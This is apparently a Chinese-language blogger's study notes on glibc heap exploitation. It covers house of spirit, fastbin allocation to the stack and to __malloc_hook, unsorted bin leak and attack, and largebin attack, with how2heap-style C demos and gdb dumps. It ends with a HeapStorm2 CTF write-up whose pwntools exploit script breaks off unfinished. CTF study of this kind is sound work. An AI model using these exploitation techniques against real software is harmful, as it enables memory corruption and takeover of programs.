    fprintf(stderr, "This file demonstrates the house of spirit attack.\n");

    fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
    malloc(1);

    fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
    unsigned long long *a;
    // This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
    unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

    fprintf(stderr, "This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[7]);

    fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
    fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
    fake_chunks[1] = 0x40; // this is the size

    fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");
        // fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
    fake_chunks[9] = 0x1234; // nextsize

    fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
    fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
    a = &fake_chunks[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
    fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}

运行后的效果如下

➜  how2heap git:(master) ./house_of_spirit
This file demonstrates the house of spirit attack.
Calling malloc() once so that it sets up its memory.
We will now overwrite a pointer to point to a fake 'fastbin' region.
This region (memory of length: 80) contains two chunks. The first starts at 0x7ffd9bceaa58 and the second at 0x7ffd9bceaa88.
This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.
... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end.
The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.
Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, 0x7ffd9bceaa58.
... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.
Freeing the overwritten pointer.
Now the next malloc will return the region of our fake chunk at 0x7ffd9bceaa58, which will be 0x7ffd9bceaa60!
malloc(0x30): 0x7ffd9bceaa60

小总结

可以看出，想要使用该技术分配 chunk 到指定地址，其实并不需要修改指定地址的任何内容，关键是要能够修改指定地址的前后的内容使其可以绕过对应的检测。还能怎样绕过呢? 暂时只知道上面的方法, 有待补充.

Alloc to Stack

介绍

前文所讲的 Fastbin Double Free 与 house of spirit 技术和本节所讲的Alloc to Stack，它们的本质都在于 fastbin 链表的特性：当前 chunk 的 fd 指针指向下一个 chunk。

该技术的核心点在于劫持 fastbin 链表中 chunk 的 fd 指针，把 fd 指针指向我们想要分配的栈上，从而实现控制栈中的一些关键数据，比如返回地址等。

演示

这次我们把 fake_chunk 置于栈中称为 stack_chunk，同时劫持了 fastbin 链表中 chunk 的 fd 值，通过把这个 fd 值指向 stack_chunk 就可以实现在栈中分配 fastbin chunk。

typedef struct _chunk
{
    long long pre_size;
    long long size;
    long long fd;
    long long bk;
} CHUNK,*PCHUNK;

int main(void)
{
    CHUNK stack_chunk;

    void *chunk1;
    void *chunk_a;

    stack_chunk.size=0x21;
    chunk1=malloc(0x10); //0x10是user date, chunk1指向的是fd指针

    free(chunk1); //free chunk1之后fastbin中只有这一个chunk, fd指向NULL, 

    *(long long *)chunk1=&stack_chunk; //修改为8字节的指针, 将fd指针赋值为stack_chunk
    malloc(0x10); //将chunk1取出
    chunk_a=malloc(0x10); //malloc出了一个fack_chunk(stack_chunk), 这样我们就可以修改栈上的数据了
    return 0;
}

通过 gdb 调试可以看到我们首先把 chunk1 的 fd 指针指向了 stack_chunk

1
2
3

0x602000:   0x0000000000000000  0x0000000000000021 <=== chunk1
0x602010:   0x00007fffffffde60  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000020fe1 <=== top chunk

之后第一次 malloc 使得 fastbin 链表指向了 stack_chunk，这意味着下一次分配会使用 stack_chunk 的内存进行

1
2
3

0x7ffff7dd1b20 <main_arena>:    0x0000000000000000 <=== unsorted bin
0x7ffff7dd1b28 <main_arena+8>:  0x00007fffffffde60 <=== fastbin[0]
0x7ffff7dd1b30 <main_arena+16>: 0x0000000000000000

最终第二次 malloc 返回值为 0x00007fffffffde70 也就是 stack_chunk

   0x400629 <main+83>        call   0x4004c0 <malloc@plt>
 → 0x40062e <main+88>        mov    QWORD PTR [rbp-0x38], rax
   $rax   : 0x00007fffffffde70

0x0000000000400000 0x0000000000401000 0x0000000000000000 r-x /home/Ox9A82/tst/tst
0x0000000000600000 0x0000000000601000 0x0000000000000000 r-- /home/Ox9A82/tst/tst
0x0000000000601000 0x0000000000602000 0x0000000000001000 rw- /home/Ox9A82/tst/tst
0x0000000000602000 0x0000000000623000 0x0000000000000000 rw- [heap]
0x00007ffff7a0d000 0x00007ffff7bcd000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7bcd000 0x00007ffff7dcd000 0x00000000001c0000 --- /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dcd000 0x00007ffff7dd1000 0x00000000001c0000 r-- /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dd1000 0x00007ffff7dd3000 0x00000000001c4000 rw- /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dd3000 0x00007ffff7dd7000 0x0000000000000000 rw-
0x00007ffff7dd7000 0x00007ffff7dfd000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/ld-2.23.so
0x00007ffff7fdb000 0x00007ffff7fde000 0x0000000000000000 rw-
0x00007ffff7ff6000 0x00007ffff7ff8000 0x0000000000000000 rw-
0x00007ffff7ff8000 0x00007ffff7ffa000 0x0000000000000000 r-- [vvar]
0x00007ffff7ffa000 0x00007ffff7ffc000 0x0000000000000000 r-x [vdso]
0x00007ffff7ffc000 0x00007ffff7ffd000 0x0000000000025000 r-- /lib/x86_64-linux-gnu/ld-2.23.so
0x00007ffff7ffd000 0x00007ffff7ffe000 0x0000000000026000 rw- /lib/x86_64-linux-gnu/ld-2.23.so
0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw-
0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall]

小总结

通过该技术我们可以把 fastbin chunk 分配到栈中，从而控制返回地址等关键数据。要实现这一点我们需要劫持 fastbin 中 chunk 的 fd 域，把它指到栈上，当然同时需要栈上存在有满足条件的 size 值。

Arbitrary Alloc

介绍

Arbitrary Alloc 其实与 Alloc to stack 是完全相同的，唯一的区别是分配的目标不再是栈中。事实上只要满足目标地址存在合法的 size 域（这个 size 域是构造的，还是自然存在的都无妨），我们可以把 chunk 分配到任意的可写内存中，比如 bss、heap、data、stack 等等。

演示

在这个例子，我们使用字节错位来实现直接分配 fastbin 到**_malloc_hook 的位置，相当于覆盖_malloc_hook 来控制程序流程。**

int main(void)
{
    void *chunk1;
    void *chunk_a;

    chunk1=malloc(0x60);

    free(chunk1);

    *(long long *)chunk1=0x7ffff7dd1af5-0x8;	//1ad5是malloc_hook的位置, 由于fd指针指向的是chunk的开头, 
    										//所以要覆盖malloc_hook要往前8字节使其成为user date
    malloc(0x60); //malloc出temp
    chunk_a=malloc(0x60); //往这个指针里面写内容就可以改写malloc_hook
    return 0;
}

这里的 0x7ffff7dd1af5 是我根据本机的情况得出的值，这个值是怎么获得的呢？首先我们要观察欲写入地址附近是否存在可以字节错位的情况。

0x7ffff7dd1a88 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1a90 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1a98 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1aa0 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1aa8 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ab0 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ab8 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ac0 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ac8 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ad0 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ad8 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ae0 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ae8 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1af0 0x60 0x2 0xdd 0xf7 0xff 0x7f 0x0 0x0
0x7ffff7dd1af8 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1b00 0x20 0x2e 0xa9 0xf7 0xff 0x7f 0x0 0x0
0x7ffff7dd1b08 0x0  0x2a 0xa9 0xf7 0xff 0x7f 0x0 0x0
0x7ffff7dd1b10 <__malloc_hook>: 0x30    0x28    0xa9    0xf7    0xff    0x7f    0x0 0x0

0x7ffff7dd1b10 是我们想要控制的 __malloc_hook 的地址，于是我们向上寻找是否可以错位出一个合法的 size 域。因为这个程序是 64 位的，因此 fastbin 的范围为 32 字节到 128 字节 (0x20-0x80)，如下：

//这里的size指用户区域，因此会小于2倍SIZE_SZ
Fastbins[idx=0, size=0x10]
Fastbins[idx=1, size=0x20]
Fastbins[idx=2, size=0x30]
Fastbins[idx=3, size=0x40]
Fastbins[idx=4, size=0x50]
Fastbins[idx=5, size=0x60]
Fastbins[idx=6, size=0x70]

通过观察发现 0x7ffff7dd1af5 处可以现实错位构造出一个 0x000000000000007f

0x7ffff7dd1af0 0x60 0x2 0xdd 0xf7 0xff 0x7f 0x0 0x0
0x7ffff7dd1af8 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0

0x7ffff7dd1af5 <_IO_wide_data_0+309>:   0x000000000000007f

因为 0x7f 在计算 fastbin index 时，是属于 index 5 的，即 chunk 大小为 0x70 的。

1 2	`#define fastbin_index(sz) \ ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)`

（注意 sz 的大小是 unsigned int，因此只占 4 个字节）

而其大小又包含了 0x10 的 chunk_header，因此我们选择分配 0x60 的 fastbin，将其加入链表。最后经过两次分配可以观察到 chunk 被分配到 0x7ffff7dd1afd，因此我们就可以直接控制 __malloc_hook 的内容 (在我的 libc 中__realloc_hook 与__malloc_hook 是在连在一起的)。

0x4005a8 <main+66>        call   0x400450 <malloc@plt>
 →   0x4005ad <main+71>        mov    QWORD PTR [rbp-0x8], rax

 $rax   : 0x7ffff7dd1afd

0x7ffff7dd1aed <_IO_wide_data_0+301>:   0xfff7dd0260000000  0x000000000000007f
0x7ffff7dd1afd: 0xfff7a92e20000000  0xfff7a92a0000007f
0x7ffff7dd1b0d <__realloc_hook+5>:  0x000000000000007f  0x00	00000000000000
0x7ffff7dd1b1d: 0x0000000000000000  0x0000000000000000

小总结

Arbitrary Alloc 在 CTF 中用地更加频繁。我们可以利用字节错位等方法来绕过 size 域的检验，实现任意地址分配 chunk，最后的效果也就相当于任意地址写任意值。

具体题目遇到再说

unsortedbin attack

概述

Unsorted Bin Attack，顾名思义，该攻击与 Glibc 堆管理中的的 Unsorted Bin 的机制紧密相关。

Unsorted Bin Attack 被利用的前提是控制 Unsorted Bin Chunk 的 bk 指针。

Unsorted Bin Attack 可以达到的效果是实现修改任意地址值为一个较大的数值。

基本来源

当一个较大的 chunk 被分割成两半后，如果剩下的部分大于 MINSIZE，就会被放到 unsorted bin 中。
释放一个不属于 fast bin 的 chunk，并且该 chunk 不和 top chunk 紧邻时，该 chunk 会被首先放到 unsorted bin 中。关于 top chunk 的解释，请参考下面的介绍。
当进行 malloc_consolidate 时，可能会把合并后的 chunk 放到 unsorted bin 中，如果不是和 top chunk 近邻的话。

Unsorted Bin Leak

Leak 原理

如果我们可以把正确的 fd 指针 leak 出来，就可以获得一个与 main_arena 有固定偏移的地址，这个偏移可以通过调试得出。而main_arena 是一个 struct malloc_state 类型的全局变量，是 ptmalloc 管理主分配区的唯一实例。说到全局变量，立马可以想到他会被分配在 .data 或者 .bss 等段上，那么如果我们有进程所使用的 libc 的 .so 文件的话，我们就可以获得 main_arena 与 libc 基地址的偏移，实现对 ASLR 的绕过。

那么如何取得 main_arena 与 libc 基址的偏移呢？这里提供两种思路。

__malloc_trim 函数得出

在 malloc.c 中有这样一段代码

int
__malloc_trim (size_t s)
{
  int result = 0;

  if (__malloc_initialized < 0)
    ptmalloc_init ();

  mstate ar_ptr = &main_arena;	//<=here!
  do
    {
      __libc_lock_lock (ar_ptr->mutex);
      result |= mtrim (ar_ptr, s);
      __libc_lock_unlock (ar_ptr->mutex);

      ar_ptr = ar_ptr->next;
    }
  while (ar_ptr != &main_arena);

  return result;
}

注意到 mstate ar_ptr = &main_arena; 这里对 main_arena 进行了访问，所以我们就可以通过 IDA 等工具分析出偏移了。

比如把 .so 文件放到 IDA 中，找到 malloc_trim 函数，就可以获得偏移了。

__malloc_hook 直接算出

比较巧合的是，main_arena 和 __malloc_hook 的地址差是 0x10，而大多数的 libc 都可以直接查出 __malloc_hook 的地址，这样可以大幅减小工作量。以 pwntools 为例

1	`main_arena_offset = ELF("libc.so.6").symbols["__malloc_hook"] + 0x10`

这样就可以获得 main_arena 与基地址的偏移了。

实现 Leak 的方法

一般来说，要实现 leak，需要有 UAF，将一个 chunk 放入 Unsorted Bin 中后再打出其 fd。一般的笔记管理题都会有 show 的功能，对处于链表尾的节点 show 就可以获得 libc 的基地址了。

特别的，CTF 中的利用，堆往往是刚刚初始化的，所以 Unsorted Bin 一般都是干净的，当里面只存在一个 bin 的时候，该 bin 的 fd 和 bk 都会指向 main_arena 中。

另外，如果我们无法做到访问链表尾，但是可以访问链表头，那么在 32 位的环境下，对链表头进行 printf 等往往可以把 fd 和 bk 一起输出出来，这个时候同样可以实现有效的 leak。

然而在 64 位下，由于高地址往往为 \x00，很多输出函数会被截断，这个时候可能就难以实现有效 leak。

Unsorted Bin Attack 原理

在 glibc/malloc/malloc.c 中的 _int_malloc 有这么一段代码，当将一个 unsorted bin 取出的时候，会将 bck->fd 的位置写入本 Unsorted Bin 的位置。

/* remove from unsorted list */
if (__glibc_unlikely (bck->fd != victim))
  malloc_printerr ("malloc(): corrupted unsorted chunks 3");
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

换而言之，如果我们控制了 bk 的值，我们就能将 unsorted_chunks (av) 写到任意地址。

注意!!!这种检查从2.28版本开始, 本篇部分2.27已修改为2.28版本, 更新的有待更新

这里我以 shellphish 的 how2heap 仓库中的 unsorted_bin_attack.c 为例进行介绍，这里我做一些简单的修改，如下

#include <stdio.h>
#include <stdlib.h>

int main() {
  fprintf(stderr, "This file demonstrates unsorted bin attack by write a large "
                  "unsigned long value into stack\n");
  fprintf(
      stderr,
      "In practice, unsorted bin attack is generally prepared for further "
      "attacks, such as rewriting the "
      "global variable global_max_fast in libc for further fastbin attack\n\n");

  unsigned long target_var = 0;
  fprintf(stderr,
          "Let's first look at the target we want to rewrite on stack:\n");
  fprintf(stderr, "%p: %ld\n\n", &target_var, target_var);

  unsigned long *p = malloc(400);
  fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n",
          p);
  fprintf(stderr, "And allocate another normal chunk in order to avoid "
                  "consolidating the top chunk with"
                  "the first one during the free()\n\n");
  malloc(500);

  free(p);
  fprintf(stderr, "We free the first chunk now and it will be inserted in the "
                  "unsorted bin with its bk pointer "
                  "point to %p\n",
          (void *)p[1]);

  /*------------VULNERABILITY-----------*/
  p[1] = (unsigned long)(&target_var - 2);
  fprintf(stderr, "Now emulating a vulnerability that can overwrite the "
                  "victim->bk pointer\n");
  fprintf(stderr, "And we write it with the target address-16 (in 32-bits "
                  "machine, it should be target address-8):%p\n\n",
          (void *)p[1]);

  //------------------------------------

  malloc(400);
  fprintf(stderr, "Let's malloc again to get the chunk we just free. During "
                  "this time, target should has already been "
                  "rewrite:\n");
  fprintf(stderr, "%p: %p\n", &target_var, (void *)target_var);
}

程序执行后的效果为

➜  unsorted_bin_attack git:(master) ✗ gcc unsorted_bin_attack.c -o unsorted_bin_attack
➜  unsorted_bin_attack git:(master) ✗ ./unsorted_bin_attack
This file demonstrates unsorted bin attack by write a large unsigned long value into stack
In practice, unsorted bin attack is generally prepared for further attacks, such as *rewriting the global variable global_max_fast* in libc for further fastbin attack

Let's first look at the target we want to rewrite on stack:
0x7ffe0d232518: 0

Now, we allocate first normal chunk on the heap at: 0x1fce010
And allocate another normal chunk in order to avoid consolidating the top chunk withthe first one during the free()

We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer point to 0x7f1c705ffb78
Now emulating a vulnerability that can overwrite the victim->bk pointer
And we write it with the target address-16 (in 32-bits machine, it should be target address-8):0x7ffe0d232508

Let's malloc again to get the chunk we just free. During this time, target should has already been rewrite:
0x7ffe0d232518: 0x7f1c705ffb78

这里我们可以使用一个图来描述一下具体发生的流程以及背后的原理。

初始状态时

unsorted bin 的 fd 和 bk 均指向 unsorted bin 本身。

执行 free(p)

由于释放的 chunk 大小不属于 fast bin 范围内，所以会首先放入到 unsorted bin 中。

修改 p[1]

经过修改之后，原来在 unsorted bin 中的 p 的 bk 指针就会指向 target addr-16 处伪造的 chunk，即 Target Value 处于伪造 chunk 的 fd 处。

申请 400 大小的 chunk

此时，所申请的 chunk 处于 small bin 所在的范围，其对应的 bin 中暂时没有 chunk，所以会去 unsorted bin 中找，发现 unsorted bin 不空，于是把 unsorted bin 中的最后一个 chunk 拿出来。

while ((victim = unsorted_chunks(av)->bk) != unsorted_chunks(av)) {
    bck = victim->bk;
    if (__builtin_expect(chunksize_nomask(victim) <= 2 * SIZE_SZ, 0) ||
        __builtin_expect(chunksize_nomask(victim) > av->system_mem, 0))
        malloc_printerr(check_action, "malloc(): memory corruption",
                        chunk2mem(victim), av);
    size = chunksize(victim);

    /*
       If a small request, try to use last remainder if it is the
       only chunk in unsorted bin.  This helps promote locality for
       runs of consecutive small requests. This is the only
       exception to best-fit, and applies only when there is
       no exact fit for a small chunk.
     */
    /* 显然，bck被修改，并不符合这里的要求*/
    if (in_smallbin_range(nb) && bck == unsorted_chunks(av) &&
        victim == av->last_remainder &&
        (unsigned long) (size) > (unsigned long) (nb + MINSIZE)) {
        ....
    }

    /* remove from unsorted list */
    unsorted_chunks(av)->bk = bck;
    bck->fd                 = unsorted_chunks(av);

victim = unsorted_chunks(av)->bk=p
bck = victim->bk=p->bk = target addr-16
unsorted_chunks(av)->bk = bck=target addr-16
bck->fd = *(target addr -16+16) = unsorted_chunks(av);

可以看出，在将 unsorted bin 的最后一个 chunk 拿出来的过程中，victim 的 fd 并没有发挥作用，所以即使我们修改了其为一个不合法的值也没有关系。然而，需要注意的是，unsorted bin 链表可能就此破坏，在插入 chunk 时，可能会出现问题。

即修改 target 处的值为 unsorted bin 的链表头部 0x7f1c705ffb78，也就是之前输出的信息。

We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer point to 0x7f1c705ffb78
Now emulating a vulnerability that can overwrite the victim->bk pointer
And we write it with the target address-16 (in 32-bits machine, it should be target address-8):0x7ffe0d232508

Let's malloc again to get the chunk we just free. During this time, target should has already been rewrite:
0x7ffe0d232518: 0x7f1c705ffb78

这里我们可以看到 unsorted bin attack 确实可以修改任意地址的值，但是所修改成的值却不受我们控制，唯一可以知道的是，这个值比较大。而且，需要注意的是，2.28版本已经无效

通过这个方法你可以 :

通过修改循环的次数来使得程序可以执行多次循环。
修改 heap 中的 global_max_fast 来使得更大的 chunk 可以被视为 fast bin，这样我们就可以去执行一些 fast bin attack 了。

largebin attack

Wiki

关于指定libc调试:

修改elf文件使用指定libc: ./chlibc ctest 2.27
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/bin/bash
if [ $# -ne 2 ]; then
 echo Need two arguments!
 exit 128
fi
version=$2
binary=$1
libc_path=`find /glibs -type d -regex "/glibs/$version.*amd64"`
#echo $libc_path
#exit

patchelf --set-interpreter "$libc_path/ld-linux-x86-64.so.2" $binary
patchelf --set-rpath $libc_path $binary

echo ldd output:
ldd $binary
gdb中直接打开, 使用list查看源代码所对应文件, 一般设置为dir /glibs/glibc-2.27/stdio-common/即可.

GDB Source-path Doc or make glibc from src

利用来源: unsorted bin循环中把chunk插入到large bin时没有检查链表完整性.
主要利用bck->fd = victim 和 fwd->bk_nextsize->fd_nextsize = victim, fwd是从左到右遍历出的第一个小于nb的chunk, bck是其左边一个chunk.
效果: 可以将(至少是第三个之后的)chunk的地址写到任意位置处. 可以偏移几字节使得最高位的数字填入size域.
前提:
- UAF, 或者是chunk overlapping带来的修改整个chunk的能力.
- 最大能malloc large bin.
- 对整个chunk的控制, 能写到header中的size域.
过程:
1. malloc三个chunk, 分别为small bin和两个large bin. 分配完malloc(0x20)防止合并.以chunk size = 0x3f0为分界.
2. free 1和2, 放到了unsorted bin中.
3. 然后malloc(0x90), 2移到large bin中, chunk 1被拿出分割后剩余部分放到unsorted bin.
4. free 3, 加入到unsorted bin, 现在3和分割后的1都在这里.
5. 修改2(UAF), 修改size变成小于3的一个chunk. IS_MMAPED置0, bk和bk_nextsize指针指向目标地址.
6. malloc(0x90), 此时拿出一半的1继续分割, 3加入large bin中, 2中填入的两个地址加上偏移(因为地址被当成chunk)被覆盖成3的地址.
7. 利用完毕.
注意:
- 添加小chunk来防止consolidation.
- 有两种利用方法, 加入的large的chunk大于或者小于当前最小chunk各为一种方法. 这里的过程使用的是大于.
版本变化:
- 2.30加入了对large bin跳表检查, 也就是在chunk大于large bin中最小的那一个时进行检查, 如果fwd的bck->fwd不是自身, 就报错.
  只能使用小于的那一种方法.

heapstorm

菜单题. 练练手. 怎么这么奇怪….. 源文件链接

保护全开. 完全没有符号, 一个个函数的重命名. 修改alarm的时间.

开头一个mallopt(M_MXFAST, 0)(在malloc.h)禁用了fastbin, 也就是将fastbin处理的块大小上限设置为0.
mmap 0x13370000处的一个page, 在0x13370800写入0x18(3 qword)字节的随机数. 0x13370818后赋值为第三个qword. 结尾在0x0820.
从0x0820开始, 连续16个0x10字节被赋值成第一个和第二个qword.

1
2
3

0x13370800:     a1      a2
0x13370810:     a3      a3
//每行tx不一定相等.

alloc:
- 遍历上面t2, 直到某个数值和a2相等.
- v2 > 12 && v2 <= 4096 size限制.
- calloc(注意这个会将内容清空)之后将, t1 = a1 ^ calloc_addr, t2 = a2 ^ size.
update:
- idx在0-15之间, a2 != t2.
- size < (a2 ^ t2 - 12). addr = a1 ^ t1
- 往地址addr里写入size长度的数值, 最后紧跟着strcpy一个”HEAPSTORM_II”字符串. 这个字符串长为12.
delete:
- 从t1中异或解出chunk的地址. free.
- 恢复t1 and t2.
view:
- 两个a3要修改成a4 a5, 满足两者异或==0x13377331.
- 从t1和t2解出地址和长度, 输出到stdout.

最重要的问题在于update的时候读取长度为len-12, 而HEAPSTORM_II这个字符串还带有一个空字符会被strcpy复制, 造成了NULL byte off-by-one漏洞.

~~这个NULL溢出只能修改prevsize的最低字节为空. 也就是把chunk0的size变小.~~

如果变小了, 而且prev_inuse位也被清空, 那么free掉chunk1的时候就会往前合并一个比实际小的chunk(当然fake chunk0的size要符合prev_size的值), fd和bk(或者加上fd_nextsize bk_nextsize)就被填入chunk0的区域内, 注意下最后12个字节不可用, 于是就可以修改或读取其内的内容, 或者在重新malloc之后修改chunk1的header.

这题属实超乎我的想象, 这复杂度真是够可以的, 对着别人少了十万八千字的转载源码研究了半天终于完全看懂了, 然后看到文章结尾一个参考资料, tm复制都不弄个完整的.

原版: link

学习到的点列举一下:

开头两个chunk shrink操作, 通过off-null-byte改小chunk的size域制造了一个空隙来实现chunk overlap, 通过7控制2, 8控制4.
84行时bin中有两个chunk, 4在large bin, 2在unsorted bin. 按一般large_bin_attack流程是利用第三个chunk来把unsorted放到large完成chunk的指针任意写, 将目标chunk的size改成了56(通过不断尝试aslr到56), 但是这里改写了2, 导致2的左边一个就是0x133707e0, 再左边没有设置指针, 可想而知unsorted bin大循环最终会出错. 不过利用大循环中的找到exact fit就立刻退出的特性, 只要alloc(0x48)就可以达到在指定位置malloc chunk的目的. 还要注意的是unsorted脱链的时候从右到左遍历, 会将header的bk设置为victim的bk, 所以在之前的largebin attack中除了size域还设置了bk指针为一个真实chunk, 即可避免seg fault
所以largebin attack加上unsorted bin循环利用还可以实现指定位置分配堆块.
然后就完成了任意读写的功能, 读个heap指针然后定位到某个largebin中chunk的fd_nextsize指针就可以找到libc基址, 改写__free_hook(由于RELRO).

正好也确实是那句话, largebin attack只是攻击中的一环, 还要结合其他技术才能实现利用, 这一题就用了off-null-byte + chunk overlapping + largebin attack + unsortedbin大循环.

from pwn import *
import pwnlib
 
context.binary = './heapstorm2'
context.log_level = 'debug'
sl=lambda x:p.sendline(x) 
p = None
elf = ELF('/glibs/2.24-3ubuntu1_amd64/libc-2.24.so')

def g():
    pwnlib.gdb.attach(p)
    raw_input()
    
def add(size):
    p.recvuntil('Command: ')
    sl("1")
    p.recvuntil('Size: ')
    sl(str(size))
 
def edit(index,size,content):
    p.recvuntil('Command: ',timeout=1)
    sl("2")
    p.recvuntil('Index: ')
    sl(str(index))
    p.recvuntil('Size: ')
    sl(str(size))
    p.recvuntil('Content: ',timeout=1)
    sl(content)
 
def free(index):
    p.recvuntil('Command: ')
    sl("3")
    p.recvuntil('Index: ')
    sl(str(index))
 
def view(index):
    p.recvuntil('Command: ')
    sl("4")
    p.recvuntil('Index: ')
    sl(str(index))
    p.recvuntil('Chunk[1]: ')
    return p.recv()
 
base = 0x13370800
while True:
    p = process('./heapstorm2')
    add(0x18)    #0
    add(0x508)   #1
    add(0x18)    #2
    add(0x18)    #3
    add(0x508)   #4
    add(0x18)    #5
    add(0x18)    #6  
    
    # 这一行意义不明, 可能为了方便一点点点调试
    # 主要是下一个chunk的prev_size域在malloc的过程中只有写入, 而没有读取并检查其内容. 
    # edit(1,(0x4f0+8),b'A'*(0x4f0)+p64(0x500))
    free(1)
    edit(0,(0x18-12),b'A'*(0x18-12))
    add(0x18)    #1
    add(0x4d8)   #7   to be overlapped by 1
    free(1)
    free(2)
    #occupy original position of chunk 1 2, now heap is full without free chunk
    # we can use 7 to control 2.
    # chunk 2 header is in chunk7 of (user_pointer+0x10), 
    # that is the reason of line91's double qword
    add(0x30)    #1
    add(0x4e8)   #2
 
    free(4)
    edit(3,(0x18-12),b'B'*(0x18-12))
    add(0x18)    #4
    add(0x4d8)   #8   to be overlapped by 4
    free(4)
    free(5)
    add(0x40)    #4
 
    # move 0x4e0 from unsorted bin to large bin through free and remalloc 2.
    # now we can use 8 to control freed 0x4e0
    # this can be used in largebin attack.
    free(2)
    add(0x4e8)
    free(2)
 
    #在unsorted bin中取出chunk的时候, 从右往左遍历, 最右边chunk->bk->fd=unsorted_chunks(av)
    #也就是unsorted bin的head. 在这里的效果是chunk的bk的fd(也就是base-0x20+0x10)被赋值, 也没有检查合法性.
    #否则就会出现segmentation fault.
    #可想而知, 我们并不知道bin的头结点, 不可能一直在这条链上一直遍历下去. 但申请的是0x50的chunk,
    #刚好exact fit, 马上被取出. 成功fake了一个chunk. 
    payload1 = 2*p64(0x0)+p64(0)+p64(0x4f1)+p64(0)+p64(base-0x20)
    edit(7,len(payload1),payload1)
 
    payload2 = 4*p64(0)+p64(0)+p64(0x4e1)+p64(0)+p64(base-0x20+8)+p64(0)+p64(base-0x20-0x18-5)
    edit(8,len(payload2),payload2)
 
    try:
        try:
            #0x48 to chunksize is 0x50, which is same as 0x56 no_mask version
            # gdb.attach(p)
            add(0x48)     #2
            p.clean()
            sl(b'what?')
            log.success("success")
            break
            
        except EOFError:
            # otherwise crash and try again
            # why would crash happen? because the check after calloc call _int_malloc
            # which is `assert( !mem || chunk_is_mmap(mem2chunk(mem)) || av == arena_for_chunk(mem2chunk(mem)) )`
            # if the IS_MMAPED flag is not true, then the assertion will fail. 
            # so continuous testing for a most significant half byte of heap address is IS_MMAPED on. 
            log.info("error")
            p.close()
            continue
    except BrokenPipeError:
        log.info("error")
        continue
#0x133707e0:     0x2b863cd060000000      0x0000000000000056
#0x133707f0:     0x00007f36a1fc1b58      0x0000562b863cd060
#0x13370800:     0x956bc5b57f846f56      0xfd29773a11768444
# clear out value used to xor decryption. and set condition to pass check in `view`
# @base is random read/write target address.
# the left xored size of chunk0 is large enough.
p1 = p64(0)*5+p64(0x13377331)+p64(base+0x30)
edit(2,len(p1),p1)
 
# read out some heap address
